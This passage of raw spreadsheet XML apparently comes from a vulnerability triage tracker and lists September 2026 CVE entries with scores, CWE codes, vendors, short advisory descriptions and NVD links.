t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1444" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1444" s="5" t="inlineStr" /><c r="H1444" s="5" t="n"><v>0.003</v></c><c r="I1444" s="5" t="inlineStr" /><c r="J1444" s="5" t="inlineStr" /><c r="K1444" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1444" s="5" t="inlineStr" /><c r="M1444" s="5" t="inlineStr" /><c r="N1444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1444" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1444" s="5" t="inlineStr" /><c r="R1444" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t></is></c></row><row r="1445"><c r="A1445" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1445" s="5" t="inlineStr"><is><t>CVE-2026-75741</t></is></c><c r="D1445" s="5" t="n"><v>5.4</v></c><c r="E1445" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1445" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1445" s="5" t="inlineStr" /><c r="H1445" s="5" t="n"><v>0.003</v></c><c r="I1445" s="5" t="inlineStr" /><c r="J1445" s="5" t="inlineStr" /><c r="K1445" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1445" s="5" t="inlineStr" /><c r="M1445" s="5" t="inlineStr" /><c r="N1445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1445" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1445" s="5" t="inlineStr" /><c r="R1445" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75741</t></is></c></row><row r="1446"><c r="A1446" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1446" s="5" t="inlineStr"><is><t>CVE-2026-75742</t></is></c><c r="D1446" s="5" t="n"><v>5.4</v></c><c r="E1446" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1446" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1446" s="5" t="inlineStr" /><c r="H1446" s="5" t="n"><v>0.003</v></c><c r="I1446" s="5" t="inlineStr" /><c r="J1446" s="5" t="inlineStr" /><c r="K1446" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1446" s="5" t="inlineStr" /><c r="M1446" s="5" t="inlineStr" /><c r="N1446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1446" s="5" t="inlineStr" /><c r="R1446" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75742</t></is></c></row><row r="1447"><c r="A1447" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1447" s="5" t="inlineStr"><is><t>CVE-2026-79905</t></is></c><c r="D1447" s="5" t="n"><v>5.4</v></c><c r="E1447" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1447" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1447" s="5" t="inlineStr" /><c r="H1447" s="5" t="n"><v>0.003</v></c><c r="I1447" s="5" t="inlineStr" /><c r="J1447" s="5" t="inlineStr" /><c r="K1447" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1447" s="5" t="inlineStr" /><c r="M1447" s="5" t="inlineStr" /><c r="N1447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1447" s="5" t="inlineStr" /><c r="R1447" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79905</t></is></c></row><row r="1448"><c r="A1448" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1448" s="5" t="inlineStr"><is><t>CVE-2026-84385</t></is></c><c r="D1448" s="5" t="n"><v>5.4</v></c><c r="E1448" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1448" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1448" s="5" t="inlineStr" /><c r="H1448" s="5" t="n"><v>0.001</v></c><c r="I1448" s="5" t="inlineStr" /><c r="J1448" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1448" s="5" t="inlineStr" /><c r="L1448" s="5" t="inlineStr" /><c r="M1448" s="5" t="inlineStr" /><c r="N1448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1448" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1448" s="5" t="inlineStr" /><c r="R1448" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1448" s="5" t="inlineStr"><is><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is></c><c r="T1448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t></is></c></row><row r="1449"><c r="A1449" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1449" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D1449" s="5" t="n"><v>5.4</v></c><c r="E1449" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1449" s="5" t="inlineStr" /><c r="H1449" s="5" t="n"><v>0.002</v></c><c r="I1449" s="5" t="inlineStr" /><c r="J1449" s="5" t="inlineStr" /><c r="K1449" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1449" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M1449" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N1449" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O1449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1449" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1449" s="5" t="inlineStr" /><c r="R1449" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1449" s="5" t="inlineStr"><is><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is></c><c r="T1449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="1450"><c r="A1450" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1450" s="5" t="inlineStr"><is><t>CVE-2026-12962</t></is></c><c r="D1450" s="5" t="n"><v>5.3</v></c><c r="E1450" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1450" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1450" s="5" t="inlineStr" /><c r="H1450" s="5" t="n"><v>0.004</v></c><c r="I1450" s="5" t="inlineStr" /><c r="J1450" s="5" t="inlineStr" /><c r="K1450" s="5" t="inlineStr" /><c r="L1450" s="5" t="inlineStr" /><c r="M1450" s="5" t="inlineStr" /><c r="N1450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1450" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1450" s="5" t="inlineStr" /><c r="R1450" s="5" t="inlineStr"><is><t>CWE-942</t></is></c><c r="S1450" s="5" t="inlineStr"><is><t>A Permissive Cross-domain Security Policy with Untrusted Domains in Armoury Crate allows a remote user to obtain a local user's NTLM hash by convincing the user to visit a crafted web page that sends a request containing a UNC path to the application's local service endpoint.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12962</t></is></c></row><row r="1451"><c r="A1451" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1451" s="5" t="inlineStr"><is><t>CVE-2026-19614</t></is></c><c r="D1451" s="5" t="n"><v>5.3</v></c><c r="E1451" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1451" s="5" t="inlineStr"><is><t>64c5ae8f-7972-4697-86a0-7ada793ac795</t></is></c><c r="G1451" s="5" t="inlineStr" /><c r="H1451" s="5" t="n"><v>0.002</v></c><c r="I1451" s="5" t="inlineStr" /><c r="J1451" s="5" t="inlineStr" /><c r="K1451" s="5" t="inlineStr" /><c r="L1451" s="5" t="inlineStr" /><c r="M1451" s="5" t="inlineStr" /><c r="N1451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1451" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1451" s="5" t="inlineStr" /><c r="R1451" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S1451" s="5" t="inlineStr"><is><t>The API is prone to XML external entity (XXE) injection. By default, XML external entity support is enabled.
This issue affects NanoXML: 2.2.3.</t></is></c><c r="T1451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19614</t></is></c></row><row r="1452"><c r="A1452" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1452" s="5" t="inlineStr"><is><t>CVE-2026-19625</t></is></c><c r="D1452" s="5" t="n"><v>5.3</v></c><c r="E1452" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1452" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1452" s="5" t="inlineStr" /><c r="H1452" s="5" t="n"><v>0.003</v></c><c r="I1452" s="5" t="inlineStr" /><c r="J1452" s="5" t="inlineStr" /><c r="K1452" s="5" t="inlineStr" /><c r="L1452" s="5" t="inlineStr" /><c r="M1452" s="5" t="inlineStr" /><c r="N1452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1452" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1452" s="5" t="inlineStr" /><c r="R1452" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1452" s="5" t="inlineStr"><is><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is></c><c r="T1452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19625</t></is></c></row><row r="1453"><c r="A1453" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1453" s="5" t="inlineStr"><is><t>CVE-2026-33389</t></is></c><c r="D1453" s="5" t="n"><v>5.3</v></c><c r="E1453" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1453" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1453" s="5" t="inlineStr" /><c r="H1453" s="5" t="n"><v>0.001</v></c><c r="I1453" s="5" t="inlineStr" /><c r="J1453" s="5" t="inlineStr" /><c r="K1453" s="5" t="inlineStr" /><c r="L1453" s="5" t="inlineStr" /><c r="M1453" s="5" t="inlineStr" /><c r="N1453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1453" s="5" t="inlineStr" /><c r="R1453" s="5" t="inlineStr"><is><t>CWE-671</t></is></c><c r="S1453" s="5" t="inlineStr"><is><t>An improper certificate/host key validation vulnerability was discovered in the Smart Polling functionality, which established encrypted connections to target devices without validating the remote host's identity, and no option was provided to enable it. A man-in-the-middle attacker positioned between a sensor and a polled device can, during a polling session, impersonate the device and intercept the communication, including the credentials used to access it. The captured credentials can then be replayed to authenticate against the device itself or against other devices sharing the same credentials, allowing the attacker to access and tamper with the device's data and to disrupt its operations.</t></is></c><c r="T1453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33389</t></is></c></row><row r="1454"><c r="A1454" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1454" s="5" t="inlineStr"><is><t>CVE-2026-33391</t></is></c><c r="D1454" s="5" t="n"><v>5.3</v></c><c r="E1454" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1454" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1454" s="5" t="inlineStr" /><c r="H1454" s="5" t="n"><v>0.003</v></c><c r="I1454" s="5" t="inlineStr" /><c r="J1454" s="5" t="inlineStr" /><c r="K1454" s="5" t="inlineStr" /><c r="L1454" s="5" t="inlineStr" /><c r="M1454" s="5" t="inlineStr" /><c r="N1454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1454" s="5" t="inlineStr" /><c r="R1454" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1454" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Smart Polling configuration functionality due to insufficient validation of user privileges. An authenticated user with limited privileges can remotely bypass the intended access control of the web management interface and modify the Smart Polling discovery configuration. This allows the attacker to disrupt the visibility of assets in the monitored network.</t></is></c><c r="T1454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33391</t></is></c></row><row r="1455"><c r="A1455" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1455" s="5" t="inlineStr"><is><t>CVE-2026-47680</t></is></c><c r="D1455" s="5" t="n"><v>5.3</v></c><c r="E1455" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1455" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1455" s="5" t="inlineStr" /><c r="H1455" s="5" t="n"><v>0.003</v></c><c r="I1455" s="5" t="inlineStr" /><c r="J1455" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1455" s="5" t="inlineStr" /><c r="L1455" s="5" t="inlineStr" /><c r="M1455" s="5" t="inlineStr" /><c r="N1455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1455" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1455" s="5" t="inlineStr" /><c r="R1455" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1455" s="5" t="inlineStr"><is><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is></c><c r="T1455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t></is></c></row><row r="1456"><c r="A1456" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1456" s="5" t="inlineStr"><is><t>CVE-2026-70575</t></is></c><c r="D1456" s="5" t="n"><v>5.3</v></c><c r="E1456" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1456" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1456" s="5" t="inlineStr" /><c r="H1456" s="5" t="n"><v>0.008</v></c><c r="I1456" s="5" t="inlineStr" /><c r="J1456" s="5" t="inlineStr" /><c r="K1456" s="5" t="inlineStr" /><c r="L1456" s="5" t="inlineStr" /><c r="M1456" s="5" t="inlineStr" /><c r="N1456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1456" s="5" t="inlineStr" /><c r="R1456" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1456" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Schannel allows an authorized attacker to deny service over a network.</t></is></c><c r="T1456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70575</t></is></c></row><row r="1457"><c r="A1457" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1457" s="5" t="inlineStr"><is><t>CVE-2026-77132</t></is></c><c r="D1457" s="5" t="n"><v>5.3</v></c><c r="E1457" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1457" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G1457" s="5" t="inlineStr" /><c r="H1457" s="5" t="n"><v>0.004</v></c><c r="I1457" s="5" t="inlineStr" /><c r="J1457" s="5" t="inlineStr" /><c r="K1457" s="5" t="inlineStr" /><c r="L1457" s="5" t="inlineStr" /><c r="M1457" s="5" t="inlineStr" /><c r="N1457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1457" s="5" t="inlineStr" /><c r="R1457" s="5" t="inlineStr"><is><t>CWE-200, CWE-862</t></is></c><c r="S1457" s="5" t="inlineStr"><is><t>It has been discovered that several AJAX routes used for the backend localization wizard failed to perform authorization checks. This allowed authenticated, low-privileged backend users to access information about records and content elements that fall outside of their permitted range. Exploiting this vulnerability requires a low-privileged backend user account. This issue affects TYPO3 CMS versions 10.0.0-10.4.59, 11.0.0-11.5.53, 12.0.0-12.4.48, 13.0.0-13.4.34 and 14.0.0-14.3.6.</t></is></c><c r="T1457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77132</t></is></c></row><row r="1458"><c r="A1458" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1458" s="5" t="inlineStr"><is><t>CVE-2026-78446</t></is></c><c r="D1458" s="5" t="n"><v>5.3</v></c><c r="E1458" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1458" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1458" s="5" t="inlineStr" /><c r="H1458" s="5" t="n"><v>0.006</v></c><c r="I1458" s="5" t="inlineStr" /><c r="J1458" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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58" s="5" t="inlineStr" /><c r="M1458" s="5" t="inlineStr" /><c r="N1458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1458" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1458" s="5" t="inlineStr" /><c r="R1458" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1458" s="5" t="inlineStr"><is><t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t></is></c></row><row r="1459"><c r="A1459" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1459" s="5" t="inlineStr"><is><t>CVE-2026-78631</t></is></c><c r="D1459" s="5" t="n"><v>5.3</v></c><c r="E1459" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1459" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1459" s="5" t="inlineStr" /><c r="H1459" s="5" t="n"><v>0.001</v></c><c r="I1459" s="5" t="inlineStr" /><c r="J1459" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1459" s="5" t="inlineStr" /><c r="L1459" s="5" t="inlineStr" /><c r="M1459" s="5" t="inlineStr" /><c r="N1459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1459" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1459" s="5" t="inlineStr" /><c r="R1459" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1459" s="5" t="inlineStr"><is><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is></c><c r="T1459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t></is></c></row><row r="1460"><c r="A1460" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1460" s="5" t="inlineStr"><is><t>CVE-2026-81380</t></is></c><c r="D1460" s="5" t="n"><v>5.3</v></c><c r="E1460" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1460" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1460" s="5" t="inlineStr" /><c r="H1460" s="5" t="n"><v>0.006</v></c><c r="I1460" s="5" t="inlineStr" /><c r="J1460" s="5" t="inlineStr" /><c r="K1460" s="5" t="inlineStr" /><c r="L1460" s="5" t="inlineStr" /><c r="M1460" s="5" t="inlineStr" /><c r="N1460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1460" s="5" t="inlineStr" /><c r="R1460" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S1460" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81380</t></is></c></row><row r="1461"><c r="A1461" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1461" s="5" t="inlineStr"><is><t>CVE-2026-86080</t></is></c><c r="D1461" s="5" t="n"><v>5.3</v></c><c r="E1461" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1461" s="5" t="inlineStr" /><c r="H1461" s="5" t="n"><v>0.002</v></c><c r="I1461" s="5" t="inlineStr" /><c r="J1461" s="5" t="inlineStr" /><c r="K1461" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1461" s="5" t="inlineStr" /><c r="M1461" s="5" t="inlineStr" /><c r="N1461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1461" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1461" s="5" t="inlineStr" /><c r="R1461" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1461" s="5" t="inlineStr"><is><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is></c><c r="T1461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86080</t></is></c></row><row r="1462"><c r="A1462" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1462" s="5" t="inlineStr"><is><t>CVE-2026-86714</t></is></c><c r="D1462" s="5" t="n"><v>5.3</v></c><c r="E1462" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1462" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1462" s="5" t="inlineStr" /><c r="H1462" s="5" t="n"><v>0.002</v></c><c r="I1462" s="5" t="inlineStr" /><c r="J1462" s="5" t="inlineStr" /><c r="K1462" s="5" t="inlineStr" /><c r="L1462" s="5" t="inlineStr" /><c r="M1462" s="5" t="inlineStr" /><c r="N1462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1462" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1462" s="5" t="inlineStr" /><c r="R1462" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1462" s="5" t="inlineStr"><is><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is></c><c r="T1462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86714</t></is></c></row><row r="1463"><c r="A1463" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1463" s="5" t="inlineStr"><is><t>CVE-2026-86719</t></is></c><c r="D1463" s="5" t="n"><v>5.3</v></c><c r="E1463" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1463" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1463" s="5" t="inlineStr" /><c r="H1463" s="5" t="n"><v>0.001</v></c><c r="I1463" s="5" t="inlineStr" /><c r="J1463" s="5" t="inlineStr" /><c r="K1463" s="5" t="inlineStr" /><c r="L1463" s="5" t="inlineStr" /><c r="M1463" s="5" t="inlineStr" /><c r="N1463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1463" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1463" s="5" t="inlineStr" /><c r="R1463" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1463" s="5" t="inlineStr"><is><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is></c><c r="T1463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86719</t></is></c></row><row r="1464"><c r="A1464" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1464" s="5" t="inlineStr"><is><t>CVE-2026-86737</t></is></c><c r="D1464" s="5" t="n"><v>5.3</v></c><c r="E1464" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1464" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1464" s="5" t="inlineStr" /><c r="H1464" s="5" t="n"><v>0.002</v></c><c r="I1464" s="5" t="inlineStr" /><c r="J1464" s="5" t="inlineStr" /><c r="K1464" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1464" s="5" t="inlineStr" /><c r="M1464" s="5" t="inlineStr" /><c r="N1464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1464" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1464" s="5" t="inlineStr" /><c r="R1464" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1464" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 fail to enforce asset view authorization in the GET /hardware/{asset}/barcode endpoint. Authenticated attackers can iterate asset IDs to retrieve barcodes and enumerate asset tags across tenants, including soft-deleted and cross-company assets.</t></is></c><c r="T1464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86737</t></is></c></row><row r="1465"><c r="A1465" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1465" s="5" t="inlineStr"><is><t>CVE-2026-11891</t></is></c><c r="D1465" s="5" t="n"><v>5.1</v></c><c r="E1465" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1465" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1465" s="5" t="inlineStr" /><c r="H1465" s="5" t="n"><v>0.001</v></c><c r="I1465" s="5" t="inlineStr" /><c r="J1465" s="5" t="inlineStr" /><c r="K1465" s="5" t="inlineStr" /><c r="L1465" s="5" t="inlineStr" /><c r="M1465" s="5" t="inlineStr" /><c r="N1465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1465" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1465" s="5" t="inlineStr" /><c r="R1465" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1465" s="5" t="inlineStr"><is><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is></c><c r="T1465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11891</t></is></c></row><row r="1466"><c r="A1466" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1466" s="5" t="inlineStr"><is><t>CVE-2026-12387</t></is></c><c r="D1466" s="5" t="n"><v>5.1</v></c><c r="E1466" s="5" 